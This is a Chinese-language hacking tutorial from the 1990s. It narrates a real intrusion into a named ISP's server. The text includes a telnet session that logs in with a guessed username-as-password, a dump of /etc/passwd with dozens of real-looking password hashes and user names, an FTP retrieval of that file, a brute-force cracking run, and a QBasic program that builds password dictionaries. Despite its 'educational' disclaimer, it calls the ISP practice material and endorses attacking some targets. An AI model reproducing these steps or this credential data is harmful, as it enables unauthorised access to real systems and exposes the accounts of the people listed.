這不是一個教學文件, 只是告訴你該如何破解系統, 好讓你能夠將自己的系統作安全的保護, 如果
你能夠將這份文件完全看完, 你就能夠知道電腦駭客們是如何入侵你的電腦, 我是 CoolFire, 寫
這篇文章的目的是要讓大家明白電腦安全的重要性, 並不是教人 Crack Password 若有人因此文件
導致惡意入侵別人的電腦或網路, 本人概不負責 !!
前幾次說到了 Net Coffee 店, 還好他們沒有提供客戶撥接上線的功能, 不然密碼或是帳號被人盜用
的客戶不就糗大了! 但是 CoolFire 在這兩週的探險中, 為了找一個酷似網路咖啡站台的 W3 密碼,
誤入一個號稱第一個提供網路撥接的 ISP, 且在 CoolFire 順利的抓回 /etc/passwd 之後, 使用了自己
寫的 PaSs2DiC + CJack 來解出密碼, 沒想到不用 1 分鐘, 就找出了 9 組 ID 與 Password 相同的密碼,
勿怪我沒有在這裡提醒大家, 還好我沒有找到 root password, 不然可能該系統就此停擺, 不可再見
天日也! (當然我不可能這麼作啦!).
看看最近興起的網路咖啡及各大網站的系統安全設施, 再加上 CoolFire 最近開會的時候遇到的情
況, 不難發現我們的國家正往高科技的領域快步邁進, 但是這些系統的安全性若不加強, 可能到時
候人家只要一台電腦再加上一台數據機就可以讓整個國家的金融及工商業塴潰! 大家要小心呀 !
ISP 是一般 User 撥接的源頭, 技術上理應比較強, 但還是輕易讓人入侵, 且又沒有教導 User 正確
的網路使用觀念 (Password 的設定及 proxy 的使用等), 實在不敢想像這樣的網路發展到幾年後會
是甚麼樣子 ??
這一次的說明還是沒有談到新的技巧, 在 James 將首頁更新後各位應該已經可以從中學到許多東
西了, 如果想要學習入侵, 就一定要知道最新的資訊 (入侵本國的網路則不用, 反正沒人重視網路
安全..... 真失望), 在別人還沒將 Bug 修正之前就搶先一步拿到 /etc/passwd, 所以訂閱一些網路安全
的 Mail List 是必要的, 多看一些網安有關的 News Group 也是必要的 (不僅 Hacker 如此, ISP 更要
多注意這些資訊!). 日後有空再整裡一些 Mail List 給大家 !!
本次主題: 說明如何連接該 ISP 並且對其 /etc/passwd 解碼
連接位址: www.coffee.com.tw (203.66.169.11)
特別說明: 由於本次主題說明重點使用真實的位址及名稱, 所以 CoolFire 已經 Mail 給該網頁之維
護人員更改密碼, 但該網頁之 ISP 仍為新手之練習好題材! CoolFire Mail 給該
網頁維護人員之信件內容如下, 如果他還不儘快改掉, 我也沒辦法了!
Mail sent to dhacme@tp.globalnet.com.tw:
Subject: 請速更動網頁密碼
From: CoolFire
你的網頁作得不錯, 但是因為你所設定的密碼太容易為駭客所
? 入侵, 請於見到此信後速速更改你的網頁進入密碼, 否則下次
若網頁遭到篡改, 本人概不負責!!
**** 課程開始 ****
請注意: 由於本次所作的課程內容以實作為主, 除了本人 IP 有所更改, 一切都使用本人所用之
Telnet 軟體 Log 檔收錄, 故若道德感不佳者請勿閱讀以下之詳細破解內容, 否則本人概不負責!
(連線到某一主機之後.... 此處的 ms.hinet.net.tw 是假的 Domain name)
ms.hinet.net.tw> telnet www.coffee.com.tw
Trying 203.66.169.11...
Connected to www.coffee.com.tw.
Escape character is '^]'.
Password: (隨便按一下 Enter)
Login incorrect
www login: coffee (以 Hacker 的敏銳判斷 username=coffee password=coffee)
Password:
Last login: Thu Jan 9 10:41:52 from ms.hinet.net.tw
歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
=================================================================
(直接進入核心部份)
www:~$ cd /etc
www:/etc$ ls
DIR_COLORS hosts.equiv printcap
HOSTNAME hosts.lpd profile
NETWORKING inet@ protocols
NNTP_INEWS_DOMAIN inetd.conf psdevtab
X11@ inittab rc.d/
at.deny inittab.gettyps.sample resolv.conf
bootptab ioctl.save rpc
csh.cshrc issue securetty
csh.login issue.net securetty.old
default/ klogd.pid sendmail.cf
diphosts ld.so.cache sendmail.st
exports ld.so.conf services
fastboot lilo/ shells
fdprm lilo.conf shutdownpid
fs/ localtime skel/
fstab magic slip.hosts
ftp.banner mail.rc slip.login
ftp.deny motd snooptab
ftpaccess motd.bak sudoers
ftpconversions msgs/ syslog.conf
ftpgroups mtab syslog.pid
ftpusers mtools termcap
gateways named.boot ttys
gettydefs networks utmp@
group nntpserver vga/
host.conf passwd wtmp@
hosts passwd.OLD yp.conf.example
hosts.allow passwd.old
hosts.deny ppp/
(看看我們的目標長得如何???)
www:/etc$ cat passwd
root:abcdefghijklmn:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/usr/lib/news:
uucp:*:10:14:uucp:/var/spool/uucppublic:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
nobody:*:-1:100:nobody:/dev/null:
ftp:*:404:1::/home/ftp:/bin/bash
guest:*:405:100:guest:/dev/null:/dev/null
shan:Ca3LGA8gqDV4A:501:20:Shan Huang:/home/staff/shan:/bin/bash
www:/U5N5/l0B.jWo:502:20:WWW Manager:/home/staff/www:/bin/bash
test:aFoIbr40sdbiSw:503:100:test:/home/test:/bin/bash
fax:aHhi5ZoJwWOGtc:504:100:FAX_SERVICE:/home/staff/fax:/bin/bash
women:IiO94G5YrrFfU:505:100:Perfect Women:/home/w3/women:/bin/bash
kanglin:aMjy/8maF4ZPHA:506:100:Kanglin:/home/w3/kanglin:/bin/bash
coffee:AlwDa18Au9IPg:507:100:Coffee:/home/w3/coffee:/bin/bash
bakery:aFm7GUGCuyfP2w:508:100:Bakery:/home/w3/bakery:/bin/bash
carven:aPaqr3QAdw8zbk:509:100:Carven:/home/w3/carven:/bin/bash
haurey:/2m87VjXC742s:510:100:Haurey:/home/w3/haurey:/bin/bash
prime:nPOlsQhQFJ.aM:511:100:Prime:/home/w3/prime:/bin/bash
tham:H2AOlPozwIIuo:512:100:xxxxxxxxxx:/home/w3/tham:/bin/bash
ccc:aFiKAE2saiJCMo:513:100:ccc:/home/w3/ccc:/bin/bash
sk:UPrcTmnVSkd3w:514:100:sk:/home/sk:/bin/bash
services:9yBqHWfnnNr.k:515:100:xxxx:/home/w3/haurey/services:/bin/bash
order:LpnMHVjy9M/YU:516:100:xxxx:/home/w3/haurey/order:/bin/bash
corey:mhRsFO60hFsMU:517:100:xxxx:/home/w3/haurey/corey:/bin/bash
richard:EmUWnU6Bj7hQI:519:100:richard:/home/w3/richard:/bin/bash
lilian:Opx5xwctJTO1A:520:100:lilian:/home/w3/lilian:/bin/bash
support:JdOqvTZqdZ9wQ:521:100:support:/home/w3/support:/bin/bash
hotline:BiSzCJsDhVl7c:522:100:hotline:/home/w3/hotline:/bin/bash
stonny:/UNPsb9La4nwI:523:20::/home/staff/stonny:/bin/csh
bear:w/eF/cZ32oMho:524:100:bear:/home/w3/bear:/bin/bash
lance:Pf7USG6iwgBEI:525:20:Chien-chia Lan:/home/staff/lance:/bin/tcsh
taiwankk:ijPWXFmRF79RY:526:100:hotline:/home/w3/taiwankk:/bin/bash
service:ulfWaOzIHC.M.:527:100:prime service:/home/w3/service:/bin/bash
liheng:6hGixt6Kgezmo:528:100:prime liheng:/home/w3/liheng:/bin/bash
caves:RyvviMcWTTRnc:529:100:gallery:/home/w3/caves:/bin/bash
sales:CmtV4FZsBIPvQ:518:100:prime:/home/w3/prime/sales:/bin/bash
kingtel:8E7f0PIQWfCmQ:530:100:kingtel:/home/w3/kingtel:/bin/bash
recycle1:JgbZHVRE4Jf3U:531:100:recycle1:/home/w3/recycle1:/bin/bash
recycle2:Qg85xgdnsqJYM:532:100:recycle2:/home/w3/recycle2:/bin/bash
recycle3:XhyoUBFQspiS2:533:100:recycle3:/home/w3/recycle3:/bin/bash
recycle:109mNZYIZtNEM:534:100:recycle:/home/w3/recycle:/bin/bash
hxnet:KhB./jHw.XNUI:536:100:hxnet:/home/w3/hxnet:/bin/bash
goodbook:MlD0tx.urQMYc:535:100:goodbook:/home/w3/goodbook:/bin/bash
sales1:JmKzPOBMIIYUI:537:100:sales1:/home/w3/prime/sales1:/bin/bash
rwu:Pai8mYCRQwvcs:539:100:rwu:/home/w3/kingtel/rwu:/bin/bash
charliex:Of6HaxdxkDBDw:540:100:charliex:/home/w3/kingtel/charliex:/bin/bash
jdlee:Mhq3gZNup9E3Q:538:100:jdlee:/home/w3/kingtel/jdlee:/bin/bash
tkchen:GkTU8ecYIXEyw:541:100:tkchen:/home/w3/kingtel/tkchen:/bin/bash
slb:Olf22.gHBZ.QQ:542:100:slb:/home/w3/kingtel/slb:/bin/bash
s6t4:GnHFCPdZX7nkU:543:100:s6t4:/home/w3/kingtel/s6t4:/bin/bash
lsh:GftygyOntHY6Y:545:100:lsh:/home/w3/kingtel/lsh:/bin/bash
lilly:DhKHmlKPE6tRk:544:100:lilly:/home/w3/kingtel/lilly:/bin/bash
nalcom:MhHdQ1mvge9WQ:546:100:nalcom:/home/w3/prime/nalcom:/bin/bash
jordon:mPgNPVEkIEORM:547:100:jordon:/home/w3/jordon:/bin/bash
toonfish:wTscIuas4EeTE:548:100:toonfish:/home/w3/toonfish:/bin/bash
yahoo:If.UlNFTal.bk:549:100:yahoo:/home/w3/yahoo:/bin/bash
basic:IgLUu9J03lbyU:550:100:basic:/home/w3/basic:/bin/bash
wunan:QUHEiPefAaKsU:551:100:xxxxxxxx:/home/w3/wunan:/bin/bash
kaoune:eVwM44uTLOpnY:552:100:kaoune:/home/w3/wunan/kaoune:/bin/bash
shuchuan:KgPlk7TT6pmBk:553:100:shuchuan:/home/w3/wunan/shuchuan:/bin/bash
fan:Jk6E9PqP7xemg:554:100:fan:/home/w3/toonfish/fan:/bin/bash
(CoolFire 註: 因為使用 PaSs2DiC 很容易找出 ID 與 Password 相同的. 故除了 Coffee 外, 其
它我找到密碼的 EnCode Password 部份皆改過..... 除非你一個一個試啦~~~ 我沒說喔!)
www:/etc$ exit
logout
Connection closed by foreign host.
(可以走了 !! 改用 FTP 將 /etc/passwd 給抓回來吧!)
ms.hinet.net.tw> ftp www.coffee.com.tw
Connected to www.coffee.com.tw.
220-
220- 歡 迎 光 臨 ....... 以下略! 因涉及該 ISP 的名譽, 大家自己去看吧!
220-
220-
220- There are 0 users in FTP Server now.
220- 目前已有 0 使用者在此 Server 上.
220- If you have any suggestion, please mail to:
220- service@xx.xxxxxxx.xxx.xx.
220-
220-
220-
220 www FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
(還是使用剛剛的帳號進入)
Name (www.coffee.com.tw:YourName): coffee
331 Password required for coffee.
Password:
230 User coffee logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
(直接到達檔案放置地點)
ftp> cd /etc
250 CWD command successful.
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
ttys
fdprm
group
issue
motd
mtools
profile
securetty
shells
termcap
skel
csh.cshrc
csh.login
lilo
inet
default
services
HOSTNAME
DIR_COLORS
passwd
passwd.OLD
wtmp
utmp
gettydefs
inittab.gettyps.sample
ld.so.conf
ld.so.cache
at.deny
fs
magic
rc.d
syslog.conf
printcap
inittab
sudoers
vga
diphosts
mail.rc
ppp
NNTP_INEWS_DOMAIN
sendmail.st
NETWORKING
gateways
bootptab
exports
ftpusers
host.conf
hosts
hosts.allow
hosts.deny
hosts.equiv
inetd.conf
named.boot
networks
nntpserver
protocols
resolv.conf
rpc
ftpaccess
hosts.lpd
ftpconversions
snooptab
msgs
ftpgroups
slip.login
slip.hosts
yp.conf.example
X11
lilo.conf
sendmail.cf
fstab
fastboot
mtab
syslog.pid
klogd.pid
shutdownpid
localtime
passwd.old
ioctl.save
psdevtab
ftp.banner
ftp.deny
issue.net
motd.bak
securetty.old
226 Transfer complete.
(取回該檔案)
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (4081 bytes).
226 Transfer complete.
4081 bytes received in 2.5 seconds (1.6 Kbytes/s)
(儘速離開)
ftp> bye
221 Goodbye.
好了! 有了 /etc/passwd 之後一切都好辦了, 趕緊將你的寶貝收藏 PaSs2DiC 拿出來吧 !!
快點跑一下, 讓它自動產生字典檔案:
C:\hack>pass2dic
PaSs2DiC V0.2 (C)1996 By FETAG Software Development Co. R.O.C. TAIWAN.
This tool will:
[1] Load PASSWD file and convert it to only username text file
[2] Write the file to a dictionary file you choise for target
Your Source PASSWD File Name: passwd
Your Target Dictionary Name: dic.cfe
PaSs2DiC Author: James Lin E-Mail: fetag@stsvr.showtower.com.tw
FETAG Software Development Co: http://www.showtower.com.tw/~fetag
C:\hack>
(這樣就好了 ! 自動產生的檔案會放在 dic.cfe 這個檔案中, 咱們跑一下 Brute Force 看看!)
C:\hack>fbrute passwd @dic.cfe
BRUTE!, Unix Brute Force Hacking Routine. v2.0
Copyright (C) 1990, Prometheus. DOS-fastcrypt made available by sir hackalot.
闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡闡
迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋
Attempts/Hits: 5184/9
迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋迋
Taking list input from dic.cfe
Beginning search of passwd for password: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxx found! Username: xxxxx
Match for password xxx found! Username: xxx
Match for password xxxxxx found! Username: xxxxxx
Match for password xxxxxx found! Username: xxxxxx
Match for password coffee found! Username: coffee
Match for password xxxxxxx found! Username: xxxxxxx
Match for password xxx found! Username: xxx
Match for password xxxx found! Username: xxxx
Done.
C:\hack>
看! 除了 coffee 外還是有許多人使用與 ID 相同的字作為密碼, 實在是....@#$%^...&* 因某些關係
所以其它部份要被 "馬賽克" 起來, 請各位讀者見量!
**** 再談密碼 ****
看了以上的破解示範, 就可以瞭解到許多人還是對於 "密碼" 這東西不是很有 "密碼" 的觀念, 人就是
那麼的懶, 隨便設定一個好記的, 但是這種密碼確是最不安全的, 上次我們談到如何用 QBasic 來設計
一個自動產生密碼的小程式, 相信對許多人有很大的幫助, 底下我們再來淺顯的介紹一下字母密碼的
產生方法, 相信對於你在 Hack 某站會有更大的幫助.
事情的開始是有一位網友 mail 給我, 問我字典檔要如何寫程式來 "自動擴大", 而讓我有了寫這一段的
想法, 現在我就針對這位網友的問題作一個更詳細的說明 (因已簡短回信答覆), 並且寫出來讓大家瞭
解一下, 當然我們的示範還是使用 QBasic, 因為這是最容易找到的程式了, 而且語法大家也可能會比較
熟悉一點, 如果我使用 VB 或 C 來寫, 可能有些人只會拿去用, 而不會去修改或者寫個好一點的出來!
先說明一下原理好了: 我們所要作的程式是一個自動產生字典檔的程式, 所以我們要瞭解字的字母排
列到底有哪些方法可循?? 我們先舉幾個簡單的單字出來比較看看:
[1] apple [2] guest [3] james [4] superman [5] password
OK! 來看看! 如果你有一點英文的概念的話應該會知道母音及子音吧 ! 我們首先這樣說明: 母音在英文
上有 : A E I O U 這五個, 所有的英文單字都會有這些母音 (有些沒有的可能是專有名詞或縮寫), 也
有可能是雙母音的字, 如: au, ai, ea, ei, ia, ie, ou, oe, ui... 等, 再來就是比較每個字的開頭,
有可能是母音, 也有可能是子音, 但是子音之後通常接的是母音字母, 但是也有例外, 如: student 是
兩個子音再接一個母音字母, 所以接下來依照常用字將這些子音找出來, 我想了一下大概有: br, bl,
cl, dg, dr, fl, gr, kn, ph, st, sp, wh .... 等幾種(其它請自行統計), 然後是結尾部份, 通常結
尾部分有下列幾種: e; est; ord; ard; ls; es; s...等好多好多, 我們稍為思考一下就知道要如何寫
出這樣的程式出來了 !! 我大略寫一個簡單的, 其它大家自行發揮, 如果有人學語言學的, 請幫忙弄一
份常用組合表出來, 可能會更有幫助吧 !!
底下就是該程式片段, 執行後會產生 MyDic.Txt 檔, 大小為: 22,096 Bytes 共有 3120 個字的字典!!
--------------- MakeDic.BAS Start Here ---------------
DIM FirstWord$(20)
DIM MotherWord$(13)
DIM LastWord$(12)
DATA "br", "bl", "cl", "dg", "dr", "fl", "gr", "kn", "ph", "st", "sp", "s"
DATA "t", "p", "k" , "f", "m", "n", "b","k"
DATA "a", "e", "i", "o", "u", "ai", "ei", "ea", "io", "ou", "oi", "au", "eo"
DATA "st", "ord", "ard", "e", "es", "le", "ng", "st", "ing", "n", "b", "s"
FOR I = 1 TO 20
READ FirstWord$(I)
PRINT FirstWord$(I)
NEXT I
FOR I = 1 TO 13
READ MotherWord$(I)
NEXT I
FOR I = 1 TO 12
READ LastWord$(I)
NEXT I
OPEN "MyDic.txt" FOR OUTPUT AS #1
FOR I = 1 TO 20
FOR J = 1 TO 13
FOR K = 1 TO 12
PRINT #1, FirstWord$(I) + MotherWord$(J) + LastWord$(K)
NEXT K
NEXT J
NEXT I
CLOSE : END
--------------- Cut Here, End of MakeDic.BAS ---------------
當然這只是小部份的組合, 相信你可以作出一個更大的字典檔出來, 如: 子音+母音+子音+母音+子
音, 作出來的字典檔會很嚇人喔 !! 這一個部份就講到這裡了 ! 如果你有很棒的字典產生程式,
寫好了請 Mail 一份給我喔 !! 如果可以的話請說明是否可以公佈在我的 W3 上讓其它人下載 !!
還是你只是要給我 ?!
希望每次講到密碼的問題後, 大家可以將這些密碼的產生方法與自己的密碼對照看看, 如果有相同
的請趕緊將自己的密碼換掉, 我講得口沫橫飛, 都沒有人要聽嗎 ??? 咖啡業者...... ISP 們....
教教你們的使用者吧..... 唉~~~~
**** 後語 ****
我們的首頁感謝大家的支持, 現在人數已經到達 2,000 了, 這是一個地下站 (未對外正式公佈)
很棒的一個數字, 在與其它工作室人員研究之後, 暫時不對外公佈站址, 如果你是 "誤闖" 到本
站來的! 我們歡迎你的加入, 但目前尚不考慮對外公佈站址, 請您在告訴你的朋友有這麼一個站
存在的時候, 請他不要隨便告訴別人 (請只告訴你信賴的朋友; 或對電腦有一份特別狂熱的人,
我們都歡迎他們的加入), 我們目前所採用的方式將是開放式的! 對首頁部份暫時不以密碼方式處理.
** 不要 Crack 這個首頁的 ISP!!!! 否則 FETAG Sofeware's Hacking Page 將會完全關閉, 再
也不尋找其它的地方來放置, 希望給你的是使用電腦的 "知識", 不要利用它來奪取任何的
"權利", 本首頁著重的是教育, 而不是一眛的教導攻擊的方法, 希望大家對於政府機關 (org.tw)
或教育機構 (edu.tw) 不要作任何的破壞!!
還有我的 ISP......:D
------
哇! 一份案子搞了好久, 都沒時間維護網頁了, 所以特別將維護的工作還給了 James, 希望大家多
多支持我們的園地, 我案子搞完後再跟大家談談我最近的實戰故事! 雖然沒時間寫網頁, 但是還是
會寫一些文件給大家作為參考 !!
------
再次重申, Crack 別人站台之後不要破壞別人站台中的資料, 此篇文章僅作為教育目的, 不主張你隨
便入侵他人主機.... (高-Net 還是除外)... 請勿將這類技術使用於破壞上 (又... 如果第三次世界
大戰開打, 你可以任意破壞敵國的電腦網路... 我全力支持), 最嚴重的情況(如果你真的很討厭該主
機的話)... 就將它 Shut Down.... 好了! 別太暴力了!
|